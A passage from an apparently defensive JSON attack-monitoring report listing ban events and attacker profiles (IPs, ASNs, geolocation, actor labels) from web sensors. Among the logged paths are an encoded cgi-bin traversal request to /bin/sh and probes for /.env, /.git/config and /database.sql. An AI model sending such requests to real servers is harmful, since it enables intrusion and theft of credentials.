   "t": "2026-10-05T02:08:00+02:00",
   "ip": "34.50.26.28",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-05T02:17:00+02:00",
   "ip": "93.123.109.101",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 3,
   "state": "active",
   "sensor": "edge"
  },
  {
   "t": "2026-10-05T02:17:00+02:00",
   "ip": "49.0.202.115",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 3,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T02:19:00+02:00",
   "ip": "45.148.10.5",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 3,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T02:19:00+02:00",
   "ip": "184.154.245.42",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T02:23:00+02:00",
   "ip": "94.154.43.146",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 3,
   "state": "active",
   "sensor": "edge"
  },
  {
   "t": "2026-10-05T02:25:00+02:00",
   "ip": "216.81.200.21",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-05T02:25:00+02:00",
   "ip": "221.159.119.6",
   "type": "command-injection",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T02:28:00+02:00",
   "ip": "34.22.117.21",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-05T02:40:00+02:00",
   "ip": "34.62.82.165",
   "type": "credential-probe",
   "kind": "finding",
   "severity": "critical",
   "path": "/database.sql",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-05T02:40:00+02:00",
   "ip": "34.62.82.165",
   "type": "php-probe",
   "kind": "finding",
   "severity": "medium",
   "path": "/api/phpinfo.php",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-05T02:47:00+02:00",
   "ip": "65.49.1.142",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T02:50:00+02:00",
   "ip": "184.105.247.252",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T02:53:00+02:00",
   "ip": "34.176.225.3",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-05T03:04:00+02:00",
   "ip": "34.100.153.150",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 2,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T03:18:00+02:00",
   "ip": "45.138.12.28",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-05T03:18:00+02:00",
   "ip": "45.138.12.28",
   "type": "credential-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T04:05:00+02:00",
   "ip": "45.138.12.9",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 2,
   "state": "active",
   "sensor": "edge"
  },
  {
   "t": "2026-10-05T04:09:00+02:00",
   "ip": "216.81.200.21",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-05T04:24:00+02:00",
   "ip": "216.81.200.21",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-05T04:24:00+02:00",
   "ip": "216.81.200.21",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T04:35:00+02:00",
   "ip": "66.218.236.8",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T04:44:00+02:00",
   "ip": "103.46.186.148",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T04:48:00+02:00",
   "ip": "104.244.74.39",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 2,
   "state": "active",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-05T05:10:00+02:00",
   "ip": "34.77.137.207",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 3,
   "state": "active",
   "sensor": "edge"
  },
  {
   "t": "2026-10-05T05:14:00+02:00",
   "ip": "87.120.104.29",
   "type": "credential-probe",
   "kind": "ban",
   "offence": 1,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T05:30:00+02:00",
   "ip": "64.62.156.172",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "active",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-05T05:36:00+02:00",
   "ip": "184.105.247.195",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 2,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T05:51:00+02:00",
   "ip": "20.210.186.186",
   "type": "php-probe",
   "kind": "ban",
   "offence": 4,
   "state": "active",
   "sensor": "edge"
  }
 ],
 "attackers": [
  {
   "ip": "45.138.12.28",
   "country": "Hong Kong",
   "cc": "HK",
   "city": "Sheung Wan",
   "lat": 22.286,
   "lon": 114.152,
   "asn": 218785,
   "org": "TC DATACENTER LIMITED",
   "ptr": null,
   "types": [
    "secret-probe",
    "credential-probe"
   ],
   "bans": 2,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": 156,
   "first_seen": "2026-10-05T03:18:00+02:00",
   "last_seen": "2026-10-05T03:18:00+02:00",
   "sensors": [
    "web-2",
    "web-3"
   ],
   "notes": [
    "ban expired 04:18"
   ],
   "tags": [
    "abuse-prone-hosting",
    "cluster:45.138.12.0/24",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "AS218785 TC DATACENTER (abuse-prone hosting)",
     "hunts for .env, VCS or credential files",
     "7 addresses from 45.138.12.0/24 (AS218785) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-05",
    "2026-10-06"
   ]
  },
  {
   "ip": "34.140.132.132",
   "country": "Belgium",
   "cc": "BE",
   "city": "Brussels",
   "lat": 50.8476,
   "lon": 4.35717,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "132.132.140.34.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": 156,
   "first_seen": "2026-10-05T00:39:00+02:00",
   "last_seen": "2026-10-05T00:39:00+02:00",
   "sensors": [
    "edge",
    "web-2"
   ],
   "notes": [
    "spared: shared address"
   ],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "34.47.27.5",
   "country": "Canada",
   "cc": "CA",
   "city": "Montreal",
   "lat": 45.5019,
   "lon": -73.5674,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "5.27.47.34.bc.googleusercontent.com",
   "types": [],
   "bans": 0,
   "max_offence": 0,
   "ban_state": "not banned",
   "requests_known": 129,
   "first_seen": null,
   "last_seen": null,
   "sensors": [
    "edge"
   ],
   "notes": [
    "spared: shared address"
   ],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Unattributed automated probe",
    "confidence": "low",
    "evidence": []
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "45.138.12.43",
   "country": "Hong Kong",
   "cc": "HK",
   "city": "Sheung Wan",
   "lat": 22.286,
   "lon": 114.152,
   "asn": 218785,
   "org": "TC DATACENTER LIMITED",
   "ptr": null,
   "types": [
    "cms-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": 125,
   "first_seen": "2026-10-04T23:00:00+02:00",
   "last_seen": "2026-10-04T23:00:00+02:00",
   "sensors": [
    "web-2",
    "web-3"
   ],
   "notes": [
    "ban expired 00:00",
    "spared: shared address"
   ],
   "tags": [
    "abuse-prone-hosting",
    "cluster:45.138.12.0/24",
    "multi-night"
   ],
   "paths": [
    "/wp-login.php"
   ],
   "actor": {
    "label": "Known-bad scanning infrastructure",
    "confidence": "medium",
    "evidence": [
     "AS218785 TC DATACENTER (abuse-prone hosting)",
     "7 addresses from 45.138.12.0/24 (AS218785) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-03",
    "2026-10-05"
   ]
  },
  {
   "ip": "45.138.12.22",
   "country": "Hong Kong",
   "cc": "HK",
   "city": "Sheung Wan",
   "lat": 22.286,
   "lon": 114.152,
   "asn": 218785,
   "org": "TC DATACENTER LIMITED",
   "ptr": null,
   "types": [
    "php-probe",
    "credential-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": 109,
   "first_seen": "2026-10-04T23:59:00+02:00",
   "last_seen": "2026-10-04T23:59:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [
    "ban expired 00:59"
   ],
   "tags": [
    "abuse-prone-hosting",
    "cluster:45.138.12.0/24"
   ],
   "paths": [
    "/database.sql"
   ],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "AS218785 TC DATACENTER (abuse-prone hosting)",
     "hunts for .env, VCS or credential files",
     "7 addresses from 45.138.12.0/24 (AS218785) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "87.120.104.29",
   "country": "Norway",
   "cc": "NO",
   "city": "Sandefjord",
   "lat": 59.1313,
   "lon": 10.2166,
   "asn": 211443,
   "org": "SINO WORLDWIDE TRADING LIMITED",
   "ptr": null,
   "types": [
    "credential-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "active",
   "requests_known": 108,
   "first_seen": "2026-10-05T05:14:00+02:00",
   "last_seen": "2026-10-05T05:14:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [
    "banned until Mon 06:14"
   ],
   "tags": [
    "spamhaus-drop",
    "firehol-level1"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "34.62.82.165",
   "country": "Belgium",
   "cc": "BE",
   "city": "Brussels",
   "lat": 50.8476,
   "lon": 4.35717,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "165.82.62.34.bc.googleusercontent.com",
   "types": [
    "credential-probe",
    "php-probe"
   ],
   "bans": 0,
   "max_offence": 0,
   "ban_state": "not banned",
   "requests_known": 81,
   "first_seen": "2026-10-05T02:40:00+02:00",
   "last_seen": "2026-10-05T02:40:00+02:00",
   "sensors": [
    "web-1"
   ],
   "notes": [
    "spared: shared address"
   ],
   "tags": [
    "hosting-provider"
   ],
   "paths": [
    "/api/phpinfo.php",
    "/database.sql"
   ],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "34.156.22.151",
   "country": "Belgium",
   "cc": "BE",
   "city": "Brussels",
   "lat": 50.8476,
   "lon": 4.35717,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "151.22.156.34.bc.googleusercontent.com",
   "types": [
    "credential-probe",
    "secret-probe"
   ],
   "bans": 2,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": 77,
   "first_seen": "2026-10-05T01:34:00+02:00",
   "last_seen": "2026-10-05T01:34:00+02:00",
   "sensors": [
    "web-2",
    "web-3"
   ],
   "notes": [
    "ban expired 02:34"
   ],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "34.53.212.113",
   "country": "Belgium",
   "cc": "BE",
   "city": "Brussels",
   "lat": 50.8476,
   "lon": 4.35717,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "113.212.53.34.bc.googleusercontent.com",
   "types": [],
   "bans": 0,
   "max_offence": 0,
   "ban_state": "not banned",
   "requests_known": 74,
   "first_seen": null,
   "last_seen": null,
   "sensors": [
    "web-1"
   ],
   "notes": [
    "spared: shared address"
   ],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Unattributed automated probe",
    "confidence": "low",
    "evidence": []
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "81.0.221.48",
   "country": "United Kingdom",
   "cc": "GB",
   "city": "Portsmouth",
   "lat": 50.8198,
   "lon": -1.08798,
   "asn": 51167,
   "org": "Contabo GmbH",
   "ptr": "vmi3632434.contaboserver.net",
   "types": [
    "rce-payload"
   ],
   "bans": 2,
   "max_offence": 2,
   "ban_state": "active",
   "requests_known": 20,
   "first_seen": "2026-10-05T00:51:00+02:00",
   "last_seen": "2026-10-05T01:45:00+02:00",
   "sensors": [
    "web-1",
    "web-3"
   ],
   "notes": [
    "ban expired 02:45"
   ],
   "tags": [
    "hosting-provider",
    "repeat-offender"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "34.187.18.72",
   "country": "The Netherlands",
   "cc": "NL",
   "city": "Groningen",
   "lat": 53.2194,
   "lon": 6.5665,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "72.18.187.34.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": 19,
   "first_seen": "2026-10-05T00:43:00+02:00",
   "last_seen": "2026-10-05T00:43:00+02:00",
   "sensors": [
    "web-1"
   ],
   "notes": [
    "ban expired 01:43"
   ],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "34.47.17.196",
   "country": "Canada",
   "cc": "CA",
   "city": "Montreal",
   "lat": 45.5019,
   "lon": -73.5674,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "196.17.47.34.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": 11,
   "first_seen": "2026-10-04T20:14:00+02:00",
   "last_seen": "2026-10-04T20:14:00+02:00",
   "sensors": [
    "web-1"
   ],
   "notes": [
    "ban expired 21:14"
   ],
   "tags": [
    "hosting-provider"
   ],
   "paths": [
    "/.git/config"
   ],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "104.244.74.39",
   "country": "Luxembourg",
   "cc": "LU",
   "city": "Bissen",
   "lat": 49.7902,
   "lon": 6.08557,
   "asn": 53667,
   "org": "FranTech Solutions",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 2,
   "max_offence": 2,
   "ban_state": "active",
   "requests_known": 8,
   "first_seen": "2026-10-04T19:15:00+02:00",
   "last_seen": "2026-10-05T04:48:00+02:00",
   "sensors": [
    "web-2"
   ],
   "notes": [
    "banned until Mon 10:48"
   ],
   "tags": [
    "repeat-offender",
    "multi-night"
   ],
   "paths": [
    "/.env"
   ],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05",
    "2026-10-06",
    "2026-10-07"
   ]
  },
  {
   "ip": "185.19.40.244",
   "country": "Germany",
   "cc": "DE",
   "city": "Frankfurt am Main",
   "lat": 50.1109,
   "lon": 8.68213,
   "asn": 210558,
   "org": "1337 Services GmbH",
   "ptr": null,
   "types": [
    "cms-probe"
   ],
   "bans": 1,
   "max_offence": 2,
   "ban_state": "expired",
   "requests_known": 5,
   "first_seen": "2026-10-04T23:56:00+02:00",
   "last_seen": "2026-10-04T23:56:00+02:00",
   "sensors": [
    "web-2"
   ],
   "notes": [
    "ban expired 05:56"
   ],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "repeat-offender"
   ],
   "paths": [],
   "actor": {
    "label": "Known-bad scanning infrastructure",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "81.171.74.60",
   "country": "United Kingdom",
   "cc": "GB",
   "city": "London",
   "lat": 51.5072,
   "lon": -0.127586,
   "asn": 34343,
   "org": "Eweka Internet Services B.V.",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": 5,
   "first_seen": "2026-10-04T21:25:00+02:00",
   "last_seen": "2026-10-04T21:25:00+02:00",
   "sensors": [
    "web-2"
   ],
   "notes": [
    "ban expired 22:25"
   ],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "216.81.200.21",
   "country": "United States",
   "cc": "US",
   "city": "Des Moines (Downtown Des Moines)",
   "lat": 41.5855,
   "lon": -93.6254,
   "asn": 11320,
   "org": "LightEdge Solutions",
   "ptr": "ip21.btslab.lightedge.com",
   "types": [
    "secret-probe"
   ],
   "bans": 4,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T02:25:00+02:00",
   "last_seen": "2026-10-05T04:24:00+02:00",
   "sensors": [
    "edge",
    "web-1",
    "web-2",
    "web-3"
   ],
   "notes": [],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "34.100.153.150",
   "country": "India",
   "cc": "IN",
   "city": "Mumbai",
   "lat": 18.9582,
   "lon": 72.832,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "150.153.100.34.bc.googleusercontent.com",
   "types": [
    "rce-payload"
   ],
   "bans": 3,
   "max_offence": 2,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-05T00:38:00+02:00",
   "last_seen": "2026-10-05T03:04:00+02:00",
   "sensors": [
    "web-2",
    "web-3"
   ],
   "notes": [],
   "tags": [
    "hosting-provider",
    "repeat-offender"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "49.0.202.115",
   "country": "Singapore",
   "cc": "SG",
   "city": "Singapore",
   "lat": 1.35208,
   "lon": 103.82,
   "asn": 136907,
   "org": "HUAWEI INTERNATIONAL PTE. LTD.",
   "ptr": "ecs-49-0-202-115.compute.hwclouds-dns.com",
   "types": [
    "rce-payload"
   ],
   "bans": 3,
   "max_offence": 3,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-04T18:19:00+02:00",
   "last_seen": "2026-10-05T02:17:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "hosting-provider",
    "repeat-offender",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-05",
    "2026-10-06"
   ]
  },
  {
   "ip": "223.83.183.254",
   "country": "China",
   "cc": "CN",
   "city": "Jinrongjie (Xicheng District)",
   "lat": 39.9155,
   "lon": 116.36,
   "asn": 56045,
   "org": "China Mobile Communications Corporation",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 2,
   "max_offence": 2,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-04T19:20:00+02:00",
   "last_seen": "2026-10-05T00:44:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "repeat-offender"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "34.16.151.47",
   "country": "United States",
   "cc": "US",
   "city": "Las Vegas",
   "lat": 36.1716,
   "lon": -115.139,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "47.151.16.34.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 2,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T01:35:00+02:00",
   "last_seen": "2026-10-05T01:41:00+02:00",
   "sensors": [
    "edge",
    "web-2"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "34.182.177.246",
   "country": "United States",
   "cc": "US",
   "city": "Washington D.C.",
   "lat": 38.9072,
   "lon": -77.0369,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "246.177.182.34.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 2,
   "max_offence": 2,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T22:16:00+02:00",
   "last_seen": "2026-10-04T23:42:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider",
    "repeat-offender"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "34.50.26.28",
   "country": "South Korea",
   "cc": "KR",
   "city": "Yongsan-dong",
   "lat": 37.5503,
   "lon": 126.997,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "28.26.50.34.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 2,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T00:24:00+02:00",
   "last_seen": "2026-10-05T02:08:00+02:00",
   "sensors": [
    "edge",
    "web-1"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "45.238.235.2",
   "country": "Brazil",
   "cc": "BR",
   "city": "Ferraz de Vasconcelos",
   "lat": -23.5408,
   "lon": -46.3686,
   "asn": 268350,
   "org": "R.R.COMUNICA\u00c7\u00c3O & MULTIMIDIA EIRELI",
   "ptr": "dynamic-45-238-235-2.teleleste.net.br",
   "types": [
    "rce-payload"
   ],
   "bans": 2,
   "max_offence": 2,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T21:18:00+02:00",
   "last_seen": "2026-10-05T01:57:00+02:00",
   "sensors": [
    "edge",
    "web-3"
   ],
   "notes": [],
   "tags": [
    "repeat-offender",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-05",
    "2026-10-07"
   ]
  },
  {
   "ip": "45.78.224.87",
   "country": "Singapore",
   "cc": "SG",
   "city": "Singapore",
   "lat": 1.35208,
   "lon": 103.82,
   "asn": 150436,
   "org": "Byteplus Pte. Ltd.",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 2,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T18:58:00+02:00",
   "last_seen": "2026-10-04T20:47:00+02:00",
   "sensors": [
    "web-1",
    "web-3"
   ],
   "notes": [],
   "tags": [],
   "paths": [
    "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh"
   ],
   "actor": {
    "label": "Suspected Mirai-style IoT botnet",
    "confidence": "medium",
    "evidence": [
     "IoT/router exploit path with a downloader typical of Mirai-family loaders"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "101.42.0.42",
   "country": "China",
   "cc": "CN",
   "city": "Beijing",
   "lat": 39.9042,
   "lon": 116.407,
   "asn": 45090,
   "org": "Shenzhen Tencent Computer Systems Company Limited",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T01:05:00+02:00",
   "last_seen": "2026-10-05T01:05:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "103.46.186.148",
   "country": "Indonesia",
   "cc": "ID",
   "city": "Utan",
   "lat": -6.17694,
   "lon": 106.947,
   "asn": 150462,
   "org": "PT Air Lintas Komunikasi",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T04:44:00+02:00",
   "last_seen": "2026-10-05T04:44:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-04",
    "2026-10-05",
    "2026-10-06",
    "2026-10-07"
   ]
  },
  {
   "ip": "104.211.91.50",
   "country": "India",
   "cc": "IN",
   "city": "Pune",
   "lat": 18.5204,
   "lon": 73.8567,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T21:48:00+02:00",
   "last_seen": "2026-10-04T21:48:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "124.158.13.141",
   "country": "Vietnam",
   "cc": "VN",
   "city": "Hanoi",
   "lat": 21.0278,
   "lon": 105.834,
   "asn": 38733,
   "org": "CMC Telecom Infrastructure Company",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T01:06:00+02:00",
   "last_seen": "2026-10-05T01:06:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-05",
    "2026-10-07"
   ]
  },
  {
   "ip": "136.85.99.221",
   "country": "Singapore",
   "cc": "SG",
   "city": "Singapore",
   "lat": 1.35208,
   "lon": 103.82,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "221.99.85.136.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T20:49:00+02:00",
   "last_seen": "2026-10-04T20:49:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "144.225.6.184",
   "country": "United States",
   "cc": "US",
   "city": "Las Vegas",
   "lat": 36.1716,
   "lon": -115.139,
   "asn": 7488,
